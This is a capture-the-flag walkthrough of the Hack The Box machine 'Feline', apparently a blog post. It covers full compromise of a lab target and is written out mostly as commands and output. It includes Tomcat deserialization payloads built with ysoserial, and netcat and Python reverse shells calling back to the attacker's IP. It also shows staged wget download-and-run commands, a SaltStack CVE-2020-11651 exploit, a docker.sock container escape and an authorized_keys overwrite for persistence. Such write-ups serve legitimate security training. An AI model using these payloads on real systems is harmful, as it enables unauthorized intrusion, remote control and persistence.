HTB: Feline

Details

This machine is Feline from Hack The Box

Recon

kali@kali:~$ nmap -sV -p- 10.10.10.205
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-12 10:39 EST
Nmap scan report for 10.10.10.205
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.78 seconds

User

I found a potential exploit for this tomcat version https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/, then checked it at http://10.10.10.205:8080/

Screenshot 1

Then http://10.10.10.205:8080/service

Screenshot 2

So I made a file called test.txt and tried uploading it

Screenshot 3

I also found the javascript that handles the uploading view-source:http://10.10.10.205:8080/service/script.js

Screenshot 4

When I tried uploading a png I got an interesting response in burp

Screenshot 5

So /opt/tomcat/temp may be the uploads directory, but it might also just be where it is stored pre-processing. I eventually found that uploading a file simply called "." caused another error

Screenshot 6

This gave me a more believable path of /opt/samples/uploads. So I decided to test the previously found exploit. First using ysoserial to build a payload that would simply callback

kali@kali:~$ java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections2 'nc 10.10.14.21 4444' > /tmp/test.session
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

I then uploaded the test.session file, and set a listener

kali@kali:~$ nc -nvlp 4444

I then ran another request where I set my cookie to

../../../../../../../opt/samples/uploads/test

Screenshot 7

And in the listener

connect to [10.10.14.21] from (UNKNOWN) [10.10.10.205] 36886

It had worked. So I setup another payload, this time to spawn a shell

kali@kali:~$ java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections2 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f' > /tmp/shell.session

I then repeated the process, but didn't get a shell. So I decided to try a staged payload. I created a file called shell.sh which contained

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f

I exposed this with a python simplehttpserver and generated 2 paylaods for the deserialisation

kali@kali:~$ java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections2 'wget http://10.10.14.21/shell.sh -O /tmp/shell.sh' > /tmp/stage1.session

kali@kali:~$ java -jar /opt/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections2 'sh /tmp/shell.sh' > /tmp/stage2.session

And triggered them in order, in the simplehttpserver

10.10.10.205 - - [12/Nov/2020 11:42:22] "GET /shell.sh HTTP/1.1" 200 -

And in the listener

connect to [10.10.14.21] from (UNKNOWN) [10.10.10.205] 37030
/bin/sh: 0: can't access tty; job control turned off
$

$ python3 -c "import pty;pty.spawn('/bin/bash')"
tomcat@VirusBucket:/opt/tomcat$

I had a shell, and could grab user

tomcat@VirusBucket:~$ ls -la
ls -la
total 24
drwxr-xr-x 2 root   root   4096 Jun 17 05:14 .
drwxr-xr-x 3 root   root   4096 Jun 17 03:18 ..
lrwxrwxrwx 1 root   root      9 Jun 17 05:14 .bash_history -> /dev/null
-rw-r--r-- 1 tomcat tomcat  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tomcat tomcat 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 tomcat tomcat  807 Feb 25  2020 .profile
-rw-r--r-- 1 root   root     33 Nov 12 15:46 user.txt

tomcat@VirusBucket:~$ cat user.txt
cat user.txt
[REDACTED]

Root

I found various ports listening on only localhost

tomcat@VirusBucket:/$ netstat -plnt
netstat -plnt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46855         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8080                 :::*                    LISTEN      926/java
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      926/java 

Testing I found htat port 4505 is used for software called saltstack https://docs.saltstack.com/en/latest/topics/tutorials/firewall.html which in turn led me to CVE-2020-11651 https://github.com/jasperla/CVE-2020-11651-poc

I decided to forward the port out to myself in case the target didn't have all the required modules so I moved over a socat binary an used it to do the forwarding

tomcat@VirusBucket:/tmp$ ./socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.01:4506 &

I then tested the exploit a few times to get a shell, eventually having luck with a python shell. I exposed a file called shell.py containing

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Set a listener

kali@kali:~$ nc -nlvp 5555

Used the exploit to download this onto the target

kali@kali:~$ python3 exploit.py --master 10.10.10.205 --port 8888 --exec "wget http://10.10.14.21/shell.py -O /tmp/shell.py"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (10.10.10.205:8888) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: HP8TyqMUHfPil+z1OVoqwV6srXUL4KitggRnlrgBZL0UekmKX0DiEsXGsPjynwqWgJPscINPSbs=
[+] Attemping to execute wget http://10.10.14.21/shell.py -O /tmp/shell.py on 10.10.10.205
[+] Successfully scheduled job: 20201112175426217035

And then ran it

kali@kali:~$ python3 exploit.py --master 10.10.10.205 --port 8888 --exec "python3 /tmp/shell.py"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (10.10.10.205:8888) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: HP8TyqMUHfPil+z1OVoqwV6srXUL4KitggRnlrgBZL0UekmKX0DiEsXGsPjynwqWgJPscINPSbs=
[+] Attemping to execute python3 /tmp/shell.py on 10.10.10.205
[+] Successfully scheduled job: 20201112175446127518

In my listener

connect to [10.10.14.21] from (UNKNOWN) [10.10.10.205] 57128
/bin/sh: 0: can't access tty; job control turned off
#

A root shell, grab the flag

# id
uid=0(root) gid=0(root) groups=0(root)

# pwd
/root
# ls -la
total 28
drwx------ 1 root root 4096 Jun 30 12:45 .
drwxr-xr-x 1 root root 4096 Jun 30 12:33 ..
-rw------- 1 root root 1336 Jun 30 16:12 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxr-xr-x 2 root root 4096 May  3  2020 .ssh
-rw-r--r-- 1 root root  137 Jun 30 12:41 todo.txt

Or not...

# cat todo.txt
- Add saltstack support to auto-spawn sandbox dockers through events.
- Integrate changes to tomcat and make the service open to public.

# hostname
2d24bf61767c

I was in a docket container. But I found the docker.sock file was available and writable to me

# cd /var/run
 # ls -la
total 40
drwxr-xr-x 1 root root 4096 Nov 12 15:42 .
drwxr-xr-x 1 root root 4096 Jun 30 12:33 ..
-rw-r--r-- 1 root root    3 Nov 12 15:42 crond.pid
---------- 1 root root    0 Jun 30 12:33 crond.reboot
srw-rw---- 1 root  118    0 Nov 12 15:41 docker.sock
drwxrwxrwt 2 root root 4096 Apr 22  2020 lock
drwxr-xr-x 1 root root 4096 Jun 30 12:33 salt
-rw-r--r-- 1 root root    1 Nov 12 15:42 salt-api.pid
-rw-r--r-- 1 root root    1 Nov 12 15:42 salt-master.pid
drwxr-xr-x 2 root root 4096 May  3  2020 sshd
-rw-r--r-- 1 root root    2 Nov 12 15:42 sshd.pid

This means I can access the host file system by spawning a new container with it mounted https://dejandayoff.com/the-danger-of-exposing-docker.sock/, I got a static docker binary from https://download.docker.com/linux/static/stable/x86_64/ which I loaded onto the container

# ./docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
sandbox             latest              a24bb4013296        5 months ago        5.57 MB
<none>              <none>              188a2704d8b0        6 months ago        1.06 GB

So I'll instance a new sandbox, but mount the root file system to /mnt

# python3 -c "import pty;pty.spawn('/bin/bash')"
root@2d24bf61767c:/tmp#

root@2d24bf61767c:/tmp# ./docker run -it -v /:/mnt sandbox
./docker run -it -v /:/mnt sandbox
/ # ^[[44;5R

I was now in a root shell on the new container

/ # ^[[44;5Rcd /mnt
cd /mnt
/mnt # ^[[44;8Rls -la
ls -la
total 2097232
drwxr-xr-x   20 root     root          4096 Jun 30 12:47 .
drwxr-xr-x    1 root     root          4096 Nov 12 18:15 ..
lrwxrwxrwx    1 root     root             7 Apr 23  2020 bin -> usr/bin
drwxr-xr-x    3 root     root          4096 Jul 23 06:16 boot
drwxr-xr-x    2 root     root          4096 May  7  2020 cdrom
drwxr-xr-x   17 root     root          3900 Nov 12 15:41 dev
drwxr-xr-x  101 root     root          4096 Aug 22 06:49 etc
drwxr-xr-x    3 root     root          4096 Jun 17 03:18 home
lrwxrwxrwx    1 root     root             7 Apr 23  2020 lib -> usr/lib
lrwxrwxrwx    1 root     root             9 Apr 23  2020 lib32 -> usr/lib32
lrwxrwxrwx    1 root     root             9 Apr 23  2020 lib64 -> usr/lib64
lrwxrwxrwx    1 root     root            10 Apr 23  2020 libx32 -> usr/libx32
drwx------    2 root     root         16384 May  7  2020 lost+found
drwxr-xr-x    2 root     root          4096 Apr 23  2020 media
drwxr-xr-x    2 root     root          4096 Apr 23  2020 mnt
drwxr-xr-x    5 root     root          4096 Jun 30 11:51 opt
dr-xr-xr-x  193 root     root             0 Nov 12 15:41 proc
drwx------    6 root     root          4096 Aug 26 14:28 root
drwxr-xr-x   29 root     root           920 Nov 12 16:18 run
lrwxrwxrwx    1 root     root             8 Apr 23  2020 sbin -> usr/sbin
drwxr-xr-x    6 root     root          4096 May  7  2020 snap
drwxr-xr-x    2 root     root          4096 Apr 23  2020 srv
-rw-------    1 root     root     2147483648 May  7  2020 swap.img
dr-xr-xr-x   13 root     root             0 Nov 12 15:41 sys
drwxrwxrwt    7 root     root          4096 Nov 12 18:15 tmp
drwxr-xr-x   14 root     root          4096 Apr 23  2020 usr
drwxr-xr-x   13 root     root          4096 Apr 23  2020 var

Which had the host file system

/mnt # ^[[44;8Rcd root
cd root
/mnt/root # ^[[44;13Rls -la
ls -la
total 56
drwx------    6 root     root          4096 Aug 26 14:28 .
drwxr-xr-x   20 root     root          4096 Jun 30 12:47 ..
lrwxrwxrwx    1 root     root             9 Jun 17 05:14 .bash_history -> /dev/null
-rw-r--r--    1 root     root          3106 Dec  5  2019 .bashrc
drwx------    2 root     root          4096 Jun 30 09:23 .cache
drwxr-xr-x    3 root     root          4096 Jun 30 09:31 .local
-rw-r--r--    1 root     root           161 Dec  5  2019 .profile
-rw-r--r--    1 root     root            75 Jun 30 10:23 .selected_editor
drwx------    2 root     root          4096 Jun 30 09:10 .ssh
-rw-------    1 root     root         12235 Aug 26 14:28 .viminfo
-rw-r--r--    1 root     root           165 Jun 30 11:59 .wget-hsts
-rw-------    1 root     root            33 Nov 12 15:46 root.txt
drwxr-xr-x    3 root     root          4096 May 18 08:44 snap

I could now get the root flag

/mnt/root # ^[[44;13Rcat root.txt
cat root.txt
[REDACTED]

But I also wanted a shell, so I overwrote roots authorized_keys file

 /mnt/root/.ssh # ^[[44;18Rwget http://10.10.14.21/id_rsa.pub -O /mnt/root/.ssh/authorized_keys
wget http://10.10.14.21/id_rsa.pub -O /mnt/root/.ssh/authorized
_keys
Connecting to 10.10.14.21 (10.10.14.21:80)
saving to '/mnt/root/.ssh/authorized_keys'
authorized_keys      100% |********************************|   563  0:00:00 ETA
'/mnt/root/.ssh/authorized_keys' saved

And logged in on ssh

kali@kali:~$ ssh [email protected] -i /tmp/id_rsa

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 12 Nov 2020 06:17:31 PM UTC

  System load:                      0.0
  Usage of /:                       45.5% of 19.56GB
  Memory usage:                     24%
  Swap usage:                       0%
  Processes:                        206
  Users logged in:                  0
  IPv4 address for br-e9220f64857c: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.205
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:212d

 * Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
   sudo snap install microk8s --channel=1.19/candidate --classic

   https://microk8s.io/ has docs and details.

64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Aug 26 14:28:09 2020
root@VirusBucket:~#

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.